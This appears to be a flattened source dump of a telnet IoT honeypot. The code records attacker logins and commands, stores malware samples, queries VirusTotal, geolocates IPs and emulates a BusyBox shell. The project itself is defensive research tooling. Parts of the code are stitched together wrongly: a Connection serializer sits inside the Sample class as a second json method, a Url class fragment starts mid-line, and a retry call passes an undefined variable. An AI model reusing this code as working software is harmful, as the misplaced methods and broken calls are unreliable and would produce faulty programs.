            "urls": len(self.urls) if depth == 0 else map(lambda i: i.url, self.urls),
            "connections": len(self.connections) if depth == 0 else map(lambda i: i.id, self.connections),
            "firstconns": self.nb_firstconns,
            # Guard: networks are created (create_network) before a malware
            # family is assigned, so `malware` can legitimately be None; the
            # original unconditionally called self.malware.json() and crashed.
            "malware": self.malware.json(depth=0) if self.malware != None else None
        }
class Sample(Base):
    """A downloaded malware sample, identified by its SHA-256 digest."""
    __tablename__ = 'samples'

    id = Column('id', Integer, primary_key=True)
    sha256 = Column('sha256', String(64), unique=True, index=True)
    date = Column('date', Integer)
    name = Column('name', String(32))
    # Path of the stored sample file on disk (set once the blob is saved).
    file = Column('file', String(512))
    length = Column('length', Integer)
    # VirusTotal summary string, e.g. "12/60 Linux.Mirai".
    result = Column('result', String(32))
    info = Column('info', Text())

    urls = relationship("Url", back_populates="sample")

    network_id = Column('network', None, ForeignKey('network.id'), index=True)
    network = relationship("Network", back_populates="samples")

    def json(self, depth=0):
        return {
            "sha256": self.sha256,
            "date": self.date,
            "name": self.name,
            "length": self.length,
            "result": self.result,
            "info": self.info,
            "urls": len(self.urls) if depth == 0 else map(lambda url: url.json(depth - 1), self.urls),
            # Guard: a sample may not be assigned to a network yet; the
            # original called self.network.json() at depth > 0 and crashed
            # on None.
            "network": self.network_id if depth == 0 else (self.network.json() if self.network != None else None)
        }
    def json(self, depth=0):
        # Serialize this connection. depth == 0 returns scalar ids/counts for
        # related rows; depth > 0 recursively serializes them and also decodes
        # the recorded event stream.
        stream = None
        if depth > 0:
            try:
                stream = json.loads(self.stream)
            except:
                try:
                    # Fix Truncated JSON: the stored stream can be cut off by
                    # the column size limit -- trim back to the last complete
                    # object and close the array so it parses again.
                    s = self.stream[:self.stream.rfind("}")] + "}]"
                    stream = json.loads(s)
                except:
                    stream = []
        return {
            "id": self.id,
            "ip": self.ip,
            "date": self.date,
            "user": self.user,
            "password": self.password,
            "connhash": self.connhash,
            "stream": stream,
            "network": self.network_id if depth == 0 else (self.network.json() if self.network != None else None),
            "asn": None if self.asn == None else self.asn.json(0),
            "ipblock": self.ipblock,
            "country": self.country,
            "city": self.city,
            "longitude": self.lon,
            "latitude": self.lat,
            "conns_before": map(lambda conn: conn.id if depth == 0 else conn.json(depth - 1), self.conns_before),
            "conns_after": map(lambda conn: conn.id if depth == 0 else conn.json(depth - 1), self.conns_after),
            # NOTE(review): assumes backend_user is always set; a NULL
            # backend_user_id would raise AttributeError here -- confirm.
            "backend_user": self.backend_user.username,
            "urls": len(self.urls) if depth == 0 else map(lambda url: url.json(depth - 1), self.urls),
            "tags": len(self.tags) if depth == 0 else map(lambda tag: tag.json(depth - 1), self.tags),
        }
back_populates="urls") connections = relationship("Connection", secondary=conns_urls, back_populates="urls") asn_id = Column('asn', None, ForeignKey('asn.asn')) asn = relationship("ASN", back_populates="urls") ip = Column('ip', String(32)) country = Column('country', String(3)) def json(self, depth=0): return { "url": self.url, "date": self.date, "sample": None if self.sample == None else (self.sample.sha256 if depth == 0 else self.sample.json(depth - 1)), "connections": len(self.connections) if depth == 0 else map(lambda connection : connection.json(depth - 1), self.connections), "asn": None if self.asn == None else (self.asn.asn if depth == 0 else self.asn.json(depth - 1)), "ip": self.ip, "country": self.country, "network": self.network_id if depth == 0 else self.network.json() } class Tag(Base): __tablename__ = 'tags' id = Column('id', Integer, primary_key=True) name = Column('name', String(32), unique=True) code = Column('code', String(256)) connections = relationship("Connection", secondary=conns_tags, back_populates="tags") def json(self, depth=0): return { "name": self.name, "code": self.code, "connections": None if depth == 0 else map(lambda connection : connection.json(depth - 1), self.connections) } samples = Sample.__table__ conns = Connection.__table__ urls = Url.__table__ tags = Tag.__table__ eng = None if is_sqlite: eng = sqlalchemy.create_engine(config.get("sql"), poolclass=QueuePool, pool_size=1, max_overflow=20, connect_args={'check_same_thread': False}) else: eng = sqlalchemy.create_engine(config.get("sql"), poolclass=QueuePool, pool_size=config.get("max_db_conn"), max_overflow=config.get("max_db_conn")) Base.metadata.create_all(eng) def get_db(): return DB(scoped_session(sessionmaker(bind=eng))) def delete_everything(): spare_tables = ["users", "asn", "ipranges"] eng.execute("SET FOREIGN_KEY_CHECKS=0;") for table in Base.metadata.tables.keys(): if table in spare_tables: continue sql_text = "DELETE FROM " + table + ";" print sql_text 
eng.execute(sql_text) eng.execute("SET FOREIGN_KEY_CHECKS=1;") class DB: def __init__(self, sess): self.sample_dir = config.get("sample_dir") self.limit_samples = 32 self.limit_urls = 32 self.limit_conns = 32 self.sess = sess def end(self): try: self.sess.commit() finally: self.sess.remove() # INPUT def put_sample_data(self, sha256, data): file = self.sample_dir + "/" + sha256 fp = open(file, "wb") fp.write(data) fp.close() self.sess.execute(samples.update().where(samples.c.sha256 == sha256).values(file=file)) def put_sample_result(self, sha256, result): self.sess.execute(samples.update().where(samples.c.sha256 == sha256).values(result=result)) def put_url(self, url, date, url_ip, url_asn, url_country): ex_url = self.sess.execute(urls.select().where(urls.c.url == url)).fetchone() if ex_url: return ex_url["id"] else: return self.sess.execute(urls.insert().values(url=url, date=date, sample=None, ip=url_ip, asn=url_asn, country=url_country)).inserted_primary_key[0] def put_conn(self, ip, user, password, date, text_combined, asn, block, country, connhash): return self.sess.execute(conns.insert().values((None, ip, date, user, password, text_combined, asn, block, country))).inserted_primary_key[0] def put_sample(self, sha256, name, length, date, info, result): ex_sample = self.get_sample(sha256).fetchone() if ex_sample: return ex_sample["id"] else: return self.sess.execute(samples.insert().values(sha256=sha256, date=date, name=name, length=length, result=result, info=info)).inserted_primary_key[0] def link_conn_url(self, id_conn, id_url): self.sess.execute(conns_urls.insert().values(id_conn=id_conn, id_url=id_url)) def link_url_sample(self, id_url, id_sample): self.sess.execute(urls.update().where(urls.c.id == id_url).values(sample=id_sample)) def link_conn_tag(self, id_conn, id_tag): self.sess.execute(conns_tags.insert().values(id_conn=id_conn, id_tag=id_tag)) # OUTPUT def get_conn_count(self): q = """ SELECT COUNT(id) as count FROM conns """ return 
self.sess.execute(text(q)).fetchone()["count"] def get_sample_count(self): q = """ SELECT COUNT(id) as count FROM samples """ return self.sess.execute(text(q)).fetchone()["count"] def get_url_count(self): q = """ SELECT COUNT(id) as count FROM urls """ return self.sess.execute(text(q)).fetchone()["count"] def search_sample(self, q): q = "%" + q + "%" return self.sess.execute(samples.select().where(samples.c.name.like(q) | samples.c.result.like(q)).limit(self.limit_samples)) def search_url(self, q): search = "%" + q + "%" q = """ SELECT urls.url as url, urls.date as date, samples.sha256 as sample FROM urls LEFT JOIN samples on samples.id = urls.sample WHERE urls.url LIKE :search LIMIT :limit """ return self.sess.execute(text(q), {"search": search, "limit": self.limit_urls}) def get_url(self, url): q = """ SELECT urls.url as url, urls.date as date, samples.sha256 as sample, urls.id as id FROM urls LEFT JOIN samples on samples.id = urls.sample WHERE urls.url = :search """ return self.sess.execute(text(q), {"search": url}) def get_url_conns(self, id_url): q = """ SELECT conns.ip as ip, conns.user as user, conns.pass as password, conns.date as date FROM conns_urls LEFT JOIN conns on conns.id = conns_urls.id_conn WHERE conns_urls.id_url = :id_url ORDER BY conns.date DESC LIMIT :limit """ return self.sess.execute(text(q), {"id_url": id_url, "limit" : self.limit_samples}) def get_url_conns_count(self, id_url): q = """ SELECT COUNT(conns_urls.id_conn) as count FROM conns_urls WHERE conns_urls.id_url = :id_url """ return self.sess.execute(text(q), {"id_url": id_url}) def get_sample_stats(self, date_from = 0): date_from = 0 limit = self.limit_samples q = """ select samples.name as name, samples.sha256 as sha256, COUNT(samples.id) as count, MAX(conns.date) as lastseen, samples.length as length, samples.result as result from conns_urls INNER JOIN conns on conns_urls.id_conn = conns.id INNER JOIN urls on conns_urls.id_url = urls.id INNER JOIN samples on urls.sample = samples.id 
WHERE conns.date > :from GROUP BY samples.id ORDER BY count DESC LIMIT :limit""" return self.sess.execute(text(q), {"from": date_from, "limit": self.limit_samples}) def history_global(self, fromdate, todate, delta=3600): q = """ SELECT COUNT(conns.id) as count, :delta * cast((conns.date / :delta) as INTEGER) as hour FROM conns WHERE conns.date >= :from AND conns.date <= :to GROUP BY hour """ return self.sess.execute(text(q), {"from": fromdate, "to": todate, "delta": delta}) def history_sample(self, id_sample, fromdate, todate, delta=3600): q = """ SELECT COUNT(conns.id) as count, :delta * cast((conns.date / :delta) as INTEGER) as hour FROM conns INNER JOIN conns_urls on conns_urls.id_conn = conns.id INNER JOIN urls on conns_urls.id_url = urls.id WHERE urls.sample = :id_sample AND conns.date >= :from AND conns.date <= :to GROUP BY hour ORDER BY hour ASC """ return self.sess.execute(text(q), {"from": fromdate, "to": todate, "delta": delta, "id_sample" : id_sample}) def get_samples(self): return self.sess.execute(samples.select().limit(self.limit_samples)) def get_sample(self, sha256): return self.sess.execute(samples.select().where(samples.c.sha256 == sha256)) print("DB Setup done") ================================================ FILE: backend/ipdb/.gitignore ================================================ *.CSV *.csv ================================================ FILE: backend/ipdb/__init__.py ================================================ ================================================ FILE: backend/ipdb/ipdb.py ================================================ import csv import ipaddress import struct import os def ipstr2int(ip): ip = unicode(ip) ip = ipaddress.IPv4Address(ip).packed ip = struct.unpack("!I", ip)[0] return ip class Entry: def __init__(self, start, end, value): self.start = int(start) self.end = int(end) self.value = value class IPTable: def __init__(self, fname): self.tzlist = [] iplocfile = os.path.join(os.path.dirname(__file__), fname) with 
open(iplocfile, "rb") as ipcsv: reader = csv.reader(ipcsv, delimiter=',', quotechar='"') for row in reader: e = Entry(row[0], row[1], row) self.tzlist.append(e) def find_i(self, ip, start, end): if end - start < 100: for i in range(start, end): obj = self.tzlist[i] if obj.start <= ip and ip <= obj.end: return obj.value return None else: mid = start + (end - start) / 2 val = self.tzlist[mid].start if ip < val: return self.find_i(ip, start, mid) elif ip > val: return self.find_i(ip, mid, end) else: return self.tzlist[mid].value def __iter__(self): return self.tzlist.__iter__() def find_int(self, ip): return self.find_i(ip, 0, len(self.tzlist) - 1) def find(self, ip): return self.find_i(ipstr2int(ip), 0, len(self.tzlist) - 1) def get_geo(): return IPTable("IP2LOCATION-LITE-DB11.CSV") def get_asn(): return IPTable("IP2LOCATION-LITE-ASN.CSV") def get_geo_iter(): iplocfile = os.path.join(os.path.dirname(__file__), "IP2LOCATION-LITE-DB11.CSV") fp = open(iplocfile, "rb") return csv.reader(fp, delimiter=',', quotechar='"') class IPDB: def __init__(self): self.geo = get_geo() self.asn = get_asn() def find(self, ip): geo = self.geo.find(ip) asn = self.asn.find(ip) if geo != None and asn != None: r = {} r["asn"] = int(asn[3]) r["ipblock"] = asn[2] r["country"] = geo[2] r["region"] = geo[4] r["city"] = geo[5] r["zip"] = geo[8] r["lon"] = float(geo[7]) r["lat"] = float(geo[6]) r["timezone"] = geo[9] return r else: return None if __name__ == "__main__": db = IPDB() print db.find("217.81.94.77") ================================================ FILE: backend/virustotal.py ================================================ import requests import time import db import Queue from util.config import config class QuotaExceededError(Exception): def __str__(self): return "QuotaExceededError: Virustotal API Quota Exceeded" class Virustotal: def __init__(self, key): self.api_key = key self.url = "https://www.virustotal.com/vtapi/v2/" self.user_agent = "Telnet Honeybot Backend" self.engines = 
["DrWeb", "Kaspersky", "ESET-NOD32"] self.queue = Queue.Queue() self.timeout = 0 def req(self, method, url, files=None, params=None, headers=None): print "VT " + url r = None if method == "GET": r = requests.get(url, files=files, params=params, headers=headers) elif method == "POST": r = requests.post(url, files=files, params=params, headers=headers) else: raise ValueError("Unknown Method: " + str(method)) if r.status_code == 204: raise QuotaExceededError() else: return r def upload_file(self, f, fname): fp = open(f, 'rb') params = {'apikey': self.api_key} files = {'file': (fname, fp)} headers = { "User-Agent" : self.user_agent } res = self.req("POST", self.url + 'file/scan', files=files, params=params, headers=headers) json = res.json() fp.close() if json["response_code"] == 1: return json else: return None def query_hash_sha256(self, h): params = { 'apikey': self.api_key, 'resource': h } headers = { "User-Agent" : self.user_agent } res = self.req("GET", self.url + "file/report", params=params, headers=headers) json = res.json() if json["response_code"] == 1: return json else: return None def put_comment(self, obj, msg): res = None params = { 'apikey': self.api_key, 'resource': obj, "comment": msg } headers = { "User-Agent" : self.user_agent } res = self.req("GET", self.url + "comments/put", params=params, headers=headers) json = res.json() if json["response_code"] == 1: return json else: return None def get_best_result(self, r): if r["scans"]: for e in self.engines: if r["scans"][e] and r["scans"][e]["detected"]: return r["scans"][e]["result"] for e,x in r["scans"].iteritems(): if x["detected"]: return x["result"] return None else: return None ================================================ FILE: backend/virustotal_fill_db.py ================================================ import os from util.dbg import dbg from virustotal import Virustotal from sampledb import Sampledb vt = Virustotal() sdb = Sampledb() # Engines on vt providing good results engines = 
def getName(r, engines=("DrWeb", "Kaspersky", "ESET-NOD32")):
    """Return the best detection name from a VirusTotal report dict, or None.

    engines -- preferred engine order; defaults to the module's list, so
    existing getName(r) call sites behave identically.

    Fixed: the original indexed r["scans"][e] without checking membership,
    raising KeyError when a preferred engine was missing from the report;
    .iteritems() replaced with .items() for Py2/Py3 compatibility.
    """
    scans = r.get("scans")
    if not scans:
        return None
    for e in engines:
        if e in scans and scans[e]["detected"]:
            return scans[e]["result"]
    for e, x in scans.items():
        if x["detected"]:
            return x["result"]
    return None
clist.append({ "id": conn.id, "ip": conn.ip, "conns_before": map(lambda c: c.id, conn.conns_before), "conns_after": map(lambda c: c.id, conn.conns_after) }) return clist ## @db_wrapper def get_networks(self): networks = self.session.query(Network).all() ret = [] for network in networks: if len(network.samples) > 0 and network.nb_firstconns >= 10: n = network.json(depth = 0) # ips = set() # for connection in network.connections: # ips.add(connection.ip) # n["ips"] = list(ips) ret.append(n) return ret @db_wrapper def get_network(self, net_id): network = self.session.query(Network).filter(Network.id == net_id).first() ret = network.json() honeypots = {} initialconnections = filter(lambda connection: len(connection.conns_before) == 0, network.connections) ret["connectiontimes"] = map(lambda connection: connection.date, initialconnections) has_infected = set([]) for connection in network.connections: if connection.backend_user.username in honeypots: honeypots[connection.backend_user.username] += 1 else: honeypots[connection.backend_user.username] = 1 for connection_before in connection.conns_before: if connection.ip != connection_before.ip: has_infected.add(("i:" + connection.ip, "i:" + connection_before.ip)) for url in connection.urls: has_infected.add(("u:" + url.url, "i:" + connection.ip)) if url.sample: has_infected.add(("s:" + url.sample.sha256, "u:" + url.url)) ret["has_infected"] = list(has_infected) ret["honeypots"] = honeypots return ret @db_wrapper def get_network_history(self, not_before, not_after, network_id): granularity = float(3600 * 24) # 1 day timespan = float(not_after - not_before) if timespan < 3600 * 24 * 2: granularity = float(3600) * 2 conns = self.session.query(Connection.date) conns = conns.filter(Connection.network_id == network_id) conns = conns.filter(and_(not_before < Connection.date, Connection.date < not_after)) # Filter out subsequent connections conns = conns.outerjoin(conns_conns, Connection.id == conns_conns.c.id_last) conns = 
conns.filter(conns_conns.c.id_last == None) ret = [0] * int(math.ceil(timespan / granularity)) for i in range(len(ret)): ret[i] = [ not_before + i * granularity, 0 ] for date in conns.all(): i = int((date[0] - not_before) / granularity) ret[i][1] += 1 return ret @db_wrapper def get_biggest_networks_history(self, not_before, not_after): MAX_NETWORKS = 4 n = self.session.query(Connection.network_id, func.count(Connection.network_id)) n = n.filter(and_(not_before < Connection.date, Connection.date < not_after)) # Filter out subsequent connections n = n.outerjoin(conns_conns, Connection.id == conns_conns.c.id_last) n = n.filter(conns_conns.c.id_last == None) n = n.group_by(Connection.network_id) n = n.order_by(func.count(Connection.network_id).desc()) data = n.all() nb_networks = min(MAX_NETWORKS, len(data)) r = [0] * nb_networks i = 0 for net in data[:nb_networks]: network = self.session.query(Network).filter(Network.id == net[0]).first() if (network != None): r[i] = { "network": network.json(), "data": self.get_network_history(not_before, not_after, network.id) } i += 1 return r @db_wrapper def get_connection_locations(self, not_before, not_after, network_id = None): conns = self.session.query(Connection.lat, Connection.lon) conns = conns.filter(and_(not_before < Connection.date, Connection.date < not_after)) if network_id: conns = conns.filter(Connection.network_id == network_id) conns = conns.all() return conns ## @db_wrapper def get_malwares(self): malwares = self.session.query(Malware).all() return map(lambda m: m.json(), malwares) ## @db_wrapper def get_sample(self, sha256): sample = self.session.query(Sample).filter(Sample.sha256 == sha256).first() return sample.json(depth=1) if sample else None @db_wrapper def get_newest_samples(self): samples = self.session.query(Sample).order_by(desc(Sample.date)).limit(16).all() return map(lambda sample : sample.json(), samples) ## @db_wrapper def get_url(self, url): url_obj = self.session.query(Url).filter(Url.url == 
    @db_wrapper
    def connhash_tree_lines(self, lines, mincount):
        # Build one layer of the connhash tree: group connections by the
        # prefix of their connection hash covering the first `lines` commands
        # (4 hex chars per command) and keep only groups with more than
        # `mincount` members. Returns {connhash_prefix: node_dict}.
        length = 1 + lines * 4
        othercount = 0
        ret = {}
        # NOTE(review): func.substr(..., 0, length) starts at position 0 while
        # SQL substr() is conventionally 1-based -- on common backends this
        # yields length-1 characters; confirm the prefix width is intended.
        dbres = self.session.query(func.count(Connection.id),
                                   func.substr(Connection.connhash, 0, length).label("c"),
                                   Connection.stream,
                                   Connection.id).group_by("c").all()
        for c in dbres:
            count = c[0]
            connhash = c[1]
            if count > mincount:
                # Keep only inbound events: they carry the typed command text
                # shown as this node's label.
                ev_in = filter(lambda ev: ev["in"], json.loads(c[2]))
                if len(ev_in) >= lines:
                    ret[connhash] = {
                        "count": c[0],
                        "connhash": connhash,
                        "text": ev_in[lines-1]["data"],
                        "childs": [],
                        # NOTE(review): c[3] is Connection.id, not a sample id,
                        # despite the key name -- confirm consumers expect this.
                        "sample_id": c[3]
                    }
            else:
                # Tally of groups below the threshold; currently not returned.
                othercount += count
        return ret
"cleardb": print "This will DELETE ALL DATA except users and cached asn data" print "from the database currently used at:" print "" print " " + config.get("sql") print "" print "If you really want to DELETE ALL DATA, type 'delete' and press enter." print "" doit = sys.stdin.readline() print "" if doit.strip() != "delete": print "ABORTED" sys.exit(0) from backend.db import delete_everything delete_everything() sys.exit(0) # Import from backend is faster: # Benchmark: # CPU: Intel(R) Core(TM) i5-6500 CPU @ 3.20GHz # Storage: Samsung SSD PM961 # File size: 7,3M # SQLite: # honeypot: 0m26,056s # backend: 0m21,445s # Mariadb: # honeypot: 0m32,684s # backend: 0m14,849s if len(sys.argv) > 2 and sys.argv[1] == "import": from backend.clientcontroller import ClientController fname = sys.argv[2] if len(sys.argv) > 3: username = sys.argv[3] else: username = config.get("backend_user") print "Importing " + fname + " as user " + username with open(fname, "rb") as fp: ctrl = ClientController() for line in fp: line = line.strip() obj = json.loads(line) if obj["ip"] != None and obj["date"] >= 1515899912: print "conn " + obj["ip"] + " date " + str(obj["date"]) obj["backend_username"] = username try: ctrl.put_session(obj) except: print "Cannot Put Session" print "----------------------------" traceback.print_exc() print "----------------------------" print repr(obj) sys.exit(0) sys.exit(0) if len(sys.argv) > 1: print "Unknown action '" + sys.argv[1] + "'" print "Available commands:" print " import file.json : imports raw og file" print " cleardb : deletes all data from db" print "To simply start the backend, use no command at all" sys.exit(0) from backend.backend import run run() ================================================ FILE: config.dist.yaml ================================================ # This is the default (distribution) config file # For local configuration, please create and edit the file "config.yaml", # this ensures your configuration to endure a update using git 
pull # this file is in YAML format # If you don't know YAML, check https://de.wikipedia.org/wiki/YAML # or just copy around existing entries ############################################# # Global config # used by both honeypot AND backend # Credentials for authentication # Used by honeypot only # If not set, will be randomly generated # If the backend cannot find a user with id == 1 in its database, # it will generate one using these credentials (or the ones autogenerated) # backend_user: "CHANGEME" # backend_pass: "CHANGEME" ############################################## # Honeypot configuration # Backend URL to which honeypot will connect to store data backend: "http://localhost:5000" # Write raw data to logfile, can be imported into backend db later # does include everything EXCEPT sample contents log_raw: null # Save samples in sample_dir log_samples: False # Do not download any samples, use their url as content # useful for debugging fake_dl: false # Telnet port telnet_addr: "" telnet_port: 2323 # Timeout in seconds for telnet session. Will expire if no bytes can be read from socket. telnet_session_timeout: 60 # Maximum session length in seconds.
telnet_max_session_length: 120 # Minimum time between 2 connections from the same ip, if closer together # they will be refused telnet_ip_min_time_between_connections: 30 ############################################# # Backend configuration # sqlalchemy sql connect string # examples: # using sqlite: "sqlite:///database.db" # using mysql: "mysql+mysqldb://USER:PASSWORD@MYSQL_HOST/DATABASE_NAME" sql: "sqlite:///database.db" # IP Address and port for http interface http_port: 5000 http_addr: "127.0.0.1" # Max connections to sql db, maybe restricted in some scenarios max_db_conn: 1 # Directory in which samples are stored sample_dir: "samples" # Virustotal API key vt_key: "GET_YOUR_OWN" submit_to_vt: false # Enable or Disable IP to ASN resolution # Options: "none" | "offline" | "online" # offline works by importing data from https://lite.ip2location.com/ - download must be done manually # online works by querying origin.asn.cymru.com ip_to_asn_resolution: "online" cuckoo_enabled: false cuckoo_url_base: "http://127.0.0.1:8090" cuckoo_user: "user" cuckoo_passwd: "passwd" cuckoo_force: 0 ================================================ FILE: create_config.sh ================================================ #!/bin/bash if [ -f config.yaml ]; then echo "config.yaml already exists, aborting" exit fi user=admin pass=$(openssl rand -hex 16) salt=$(openssl rand -hex 16) echo "backend_user: $user" >> config.yaml echo "backend_pass: $pass" >> config.yaml echo "backend_salt: $salt" >> config.yaml ================================================ FILE: create_docker.sh ================================================ #!/bin/bash if [ -f config.yaml ]; then echo -n "config.yaml already exists, delete it? (Y/n): " read force if [ "$force" = "Y" ] || [ "$force" = "y" ] || [ "$force" = "" ]; then rm config.yaml else echo aborting... exit 1 fi fi if [ -f docker-compose.yml ]; then echo -n "docker-compose.yml already exists, delete it?
(Y/n): " read force if [ "$force" = "Y" ] || [ "$force" = "y" ] || [ "$force" = "" ]; then rm docker-compose.yml else echo aborting... exit 1 fi fi echo -n "DB: Use maria or sqlite? (maria/sqlite): " read dbbackend if [ "$dbbackend" != "maria" ] && [ "$dbbackend" != "sqlite" ]; then echo "$dbbackend is not valid" exit 1 fi # Honeypot setup echo " - Writing honeypot config" user=admin pass=$(openssl rand -hex 16) salt=$(openssl rand -hex 16) echo "backend_user: $user" >> config.yaml echo "backend_pass: $pass" >> config.yaml echo "backend_salt: $salt" >> config.yaml echo "http_addr: \"0.0.0.0\"" >> config.yaml echo "telnet_addr: \"0.0.0.0\"" >> config.yaml echo "backend: \"http://backend:5000\"" >> config.yaml echo "log_samples: True" >> config.yaml echo "sample_dir: samples" >> config.yaml # DB setup if [ "$dbbackend" = "maria" ]; then dbpass=$(openssl rand -hex 16) sql="mysql+mysqldb://honey:$dbpass@honeydb/honey" echo sql: \"$sql\" >> config.yaml fi # docker-compose setup echo " - Writing docker-compose.yml" cat << EOF >> docker-compose.yml version: "3.7" services: honeypot: depends_on: - backend image: telnet-iot-honeypot:hot restart: always entrypoint: - python - honeypot.py ports: - "2323:2323" volumes: - "./samples:/usr/src/app/samples" backend: build: . image: telnet-iot-honeypot:hot restart: always entrypoint: - python - backend.py ports: - "5000:5000" volumes: - "./samples:/usr/src/app/samples" EOF if [ "$dbbackend" = "maria" ]; then cat << EOF >> docker-compose.yml depends_on: - honeydb honeydb: image: mariadb:latest restart: always environment: MYSQL_RANDOM_ROOT_PASSWORD: "yes" MYSQL_DATABASE: honey MYSQL_USER: honey MYSQL_PASSWORD: $dbpass EOF fi echo -n "Start honeypot using docker-compose now? 
d = start using daemon flag (Y/n/d): " read runit if [ "$runit" = "d" ]; then sudo docker-compose up -d elif [ "$runit" = "Y" ] || [ "$runit" = "y" ] || [ "$runit" = "" ]; then sudo docker-compose up fi ================================================ FILE: honeypot/__init__.py ================================================ ================================================ FILE: honeypot/__main__.py ================================================ import signal from telnet import Telnetd from util.dbg import dbg def signal_handler(signal, frame): dbg('Ctrl+C') srv.stop() signal.signal(signal.SIGINT, signal_handler) srv = Telnetd(2222) srv.run() ================================================ FILE: honeypot/client.py ================================================ import requests import requests.exceptions import requests.auth import json from util.dbg import dbg from util.config import config class Client: def __init__(self): self.user = config.get("backend_user") self.password = config.get("backend_pass") self.url = config.get("backend") self.auth = requests.auth.HTTPBasicAuth(self.user, self.password) self.test_login() def test_login(self): try: r = requests.get(self.url + "/connections", auth=self.auth, timeout=20.0) except: raise IOError("Cannot connect to backend") try: r = requests.get(self.url + "/login", auth=self.auth, timeout=20.0) if r.status_code != 200: raise IOError() except: raise IOError("Backend authentification test failed, check config.json") def put_session(self, session, retry=True): try: r = requests.put(self.url + "/conns", auth=self.auth, json=session, timeout=20.0) except requests.exceptions.RequestException: dbg("Cannot connect to backend") return [] if r.status_code == 200: return r.json() elif retry: msg = r.raw.read() dbg("Backend upload failed, retrying (" + str(msg) + ")") return self.put_session(session, False) else: msg = r.raw.read() raise IOError(msg) def put_sample(self, data, retry=True): try: r = requests.post(self.url + 
"/file", auth=self.auth, data=data, timeout=20.0) except requests.exceptions.RequestException: dbg("Cannot connect to backend") return if r.status_code == 200: return elif retry: msg = r.raw.read() dbg("Backend upload failed, retrying (" + str(msg) + ")") return self.put_sample(sha256, filename, False) else: msg = r.raw.read() raise IOError(msg) ================================================ FILE: honeypot/sampledb_client.py ================================================ import client import time import traceback import os import requests import hashlib import json from util.dbg import dbg from util.config import config BACKEND = None def get_backend(): global BACKEND if BACKEND != None: return BACKEND elif config.get("backend", optional=True) != None: BACKEND = client.Client() return BACKEND else: return None def sha256(data): h = hashlib.sha256() h.update(data) return h.hexdigest() class SampleRecord: def __init__(self, url, name, info, data): self.url = url self.name = name self.date = int(time.time()) self.info = info self.data = data if data: self.sha256 = sha256(data) self.length = len(data) else: self.sha256 = None self.length = None def json(self): return { "type": "sample", "url": self.url, "name": self.name, "date": self.date, "sha256": self.sha256, "info": self.info, "length": self.length } class SessionRecord: def __init__(self): self.back = get_backend() self.logfile = config.get("log_raw", optional=True) self.log_samples = config.get("log_samples", optional=True, default=False) self.sample_dir = config.get("sample_dir", optional=not(self.log_samples)) self.urlset = {} self.ip = None self.user = None self.password = None self.date = None self.urls = [] self.stream = [] def log_raw(self, obj): if self.logfile != None: with open(self.logfile, "ab") as fp: fp.write(json.dumps(obj).replace("\n", "") + "\n") def json(self): return { "type" : "connection", "ip" : self.ip, "user" : self.user, "pass" : self.password, "date" : self.date, "stream" : 
self.stream, "samples" : map(lambda sample: sample.json(), self.urls), } def addInput(self, text): self.stream.append({ "in": True, "ts": round((time.time() - self.date) * 1000) / 1000, "data": text.decode('ascii', 'ignore') }) def addOutput(self, text): self.stream.append({ "in": False, "ts": round((time.time() - self.date) * 1000) / 1000, "data": text.decode('ascii', 'ignore') }) def set_login(self, ip, user, password): self.ip = ip self.user = user self.password = password self.date = int(time.time()) def add_file(self, data, url=None, name=None, info=None): if url == None: shahash = sha256(data) # Hack, must be unique somehow, so just use the hash ..." url = "telnet://" + self.ip + "/" + shahash[0:8] if name == None: name = url.split("/")[-1].strip() sample = SampleRecord(url, name, info, data) self.urlset[url] = sample self.urls.append(sample) def commit(self): self.log_raw(self.json()) if self.log_samples: for sample in self.urls: if sample.data: fp = open(self.sample_dir + "/" + sample.sha256, "wb") fp.write(sample.data) fp.close() # Ignore connections without any input if len(self.stream) > 1 and self.back != None: upload_req = self.back.put_session(self.json()) ================================================ FILE: honeypot/session.py ================================================ import re import random import time import json import traceback import struct import socket import select import errno from util.dbg import dbg from util.config import config from sampledb_client import SessionRecord from shell.shell import Env, run MIN_FILE_SIZE = 128 PROMPT = " # " class Session: def __init__(self, output, remote_addr): dbg("New Session") self.output = output self.remote_addr = remote_addr self.record = SessionRecord() self.env = Env(self.send_string) self.env.listen("download", self.download) # Files already commited self.files = [] def login(self, user, password): dbg("Session login: user=" + user + " password=" + password) 
self.record.set_login(self.remote_addr, user, password) self.send_string(PROMPT) def download(self, data): path = data["path"] url = data["url"] info = data["info"] data = data["data"] dbg("Downloaded " + url + " to " + path) if data: self.record.add_file(data, url=url, name=path, info=info) self.files.append(path) else: self.record.add_file(None, url=url, name=path, info=info) def found_file(self, path, data): if path in self.files: pass else: if len(data) > MIN_FILE_SIZE: dbg("File created: " + path) self.record.add_file(data, name=path) else: dbg("Ignore small file: " + path + " (" + str(len(data)) + ") bytes") def end(self): dbg("Session End") for path in self.env.files: self.found_file(path, self.env.files[path]) for (path, data) in self.env.deleted: self.found_file(path, data) self.record.commit() def send_string(self, text): self.record.addOutput(text) self.output(text) def shell(self, l): self.record.addInput(l + "\n") try: tree = run(l, self.env) except: dbg("Could not parse \""+l+"\"") self.send_string("sh: syntax error near unexpected token `" + " " + "'\n") traceback.print_exc() self.send_string(PROMPT) ================================================ FILE: honeypot/shell/__init__.py ================================================ ================================================ FILE: honeypot/shell/commands/__init__.py ================================================ ================================================ FILE: honeypot/shell/commands/base.py ================================================ import sys import traceback from binary import run_binary class Proc: procs = {} @staticmethod def register(name, obj): Proc.procs[name] = obj @staticmethod def get(name): if name in Proc.procs: return Proc.procs[name] else: return None class StaticProc(Proc): def __init__(self, output, result=0): self.output = output self.result = result def run(self, env, args): env.write(self.output) return self.result class FuncProc(Proc): def __init__(self, func): 
self.func = func def run(self, env, args): env.write(self.func(args)) return 0 # Basic Procs class Exec(Proc): def run(self, env, args): if len(args) == 0: return 0 if args[0][0] == ">": name = "true" elif args[0].startswith("./"): fname = args[0][2:] fdata = env.readFile(fname) if fdata == None: env.write("sh: 1: ./" + fname + ": not found\n") return 1 else: run_binary(fdata, fname, args[1:], env) return 0 else: name = args[0] args = args[1:] # $path = /bin/ if name.startswith("/bin/"): name = name[5:] if Proc.get(name): try: return Proc.get(name).run(env, args) except: traceback.print_exc() env.write("Segmention fault\n") return 1 else: env.write(name + ": command not found\n") return 1 class BusyBox(Proc): def run(self, env, args): if len(args) == 0: env.write("""BusyBox v1.27.2 (Ubuntu 1:1.27.2-2ubuntu3) multi-call binary. BusyBox is copyrighted by many authors between 1998-2015. Licensed under GPLv2. See source distribution for detailed copyright notices. Usage: busybox [function [arguments]...] 
